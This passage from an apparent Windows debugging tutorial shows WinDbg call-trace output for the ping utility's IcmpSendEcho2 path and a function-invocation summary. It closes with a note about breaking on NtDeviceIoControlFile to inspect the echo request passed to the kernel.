ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span 
style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 3] ntdll!RtlpUpdateIndexInsertBlock</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 19 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] 
ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span 
style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 8 0 [ 3] ntdll!RtlLeaveCriticalSection</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 8 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br 
style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 3] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 4 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: 
"Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier 
New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 3] ntdll!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 9 [ 2] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 23 321 [ 1] kernel32!LocalAlloc</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 10 0 [ 2] kernel32!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 100 354 [ 0] iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 56 0 [ 1] 
kernel32!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] ntdll!ZwCreateEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 2] ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!ZwCreateEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to kernel32!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 40 3 [ 1] ntdll!ZwCreateEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 1] ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 1] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to iphlpapi!IcmpSendEcho2</span><br style="color: 
yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 3 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] kernel32!_SEH_epilog</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!ZwCreateEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 18 0 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] ntdll!NtWaitForSingleObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 2] ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] ntdll!NtWaitForSingleObject</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 24 6 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier 
New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 16 0 [ 0] ntdll!NtClose</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 8 0 [ 1] iphlpapi!Icmp6CreateFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 22 8 [ 0] ntdll!NtClose</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!KiFastSystemCall</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 1] ntdll!RtlSetLastWin32Error</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 11 19 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 1] ntdll!RtlFreeHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 2] 0x00000000</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 39 19 [ 1] ntdll!RtlFreeHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 4 
0 [ 1] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 38 81 [ 0] ntdll!NtDeviceIoControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier 
New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 11 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier 
New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlpUpdateIndexInsertBlock</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 17 0 [ 1] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 114 17 [ 0] ntdll!RtlAllocateHeap</span><br style="color: 
yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 8 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ping!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 1] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 9 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> >> Unable to match return to ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 6 0 [ 0] ntdll!RtlAllocateHeap</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 960 instructions were executed in 236 events (0 from other threads)</span><br style="color: yellow; font-family: 
"Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> Function Name Invocations MinInst MaxInst AvgInst</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0x00000000 1 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> iphlpapi!Icmp6CreateFile 1 8 8 8</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> iphlpapi!IcmpSendEcho2 1 100 100 100</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kernel32!LocalAlloc 1 23 23 23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kernel32!_SEH_epilog 3 1 56 22</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kernel32!_SEH_prolog 1 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!KiFastSystemCall 2 2 2 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!NtClose 1 22 22 22</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: 
#38761d;">ntdll!NtDeviceIoControlFile 4 1 38 19 </span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!NtWaitForSingleObject 2 1 3 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlAllocateHeap 202 1 114 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlEnterCriticalSection 1 11 11 11</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlFreeHeap 1 39 39 39</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlLeaveCriticalSection 1 8 8 8</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlSetLastWin32Error 1 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlpUpdateIndexInsertBlock 2 1 19 10</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!RtlpUpdateIndexRemoveBlock 1 17 17 17</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!ZwCreateEvent 3 1 40 14</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!_SEH_epilog 1 9 9 9</span><br style="color: 
yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ntdll!_SEH_prolog 1 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ping!IcmpSendEcho2 2 1 2 1</span></span></blockquote><ul><li>From the summary, the function <b>NtDeviceIoControlFile</b> was called. <b>ping</b> hands the user buffer (the echo request packet) to the kernel through this function, so we set a breakpoint on it and inspect the parameters it passes to the kernel: </li>
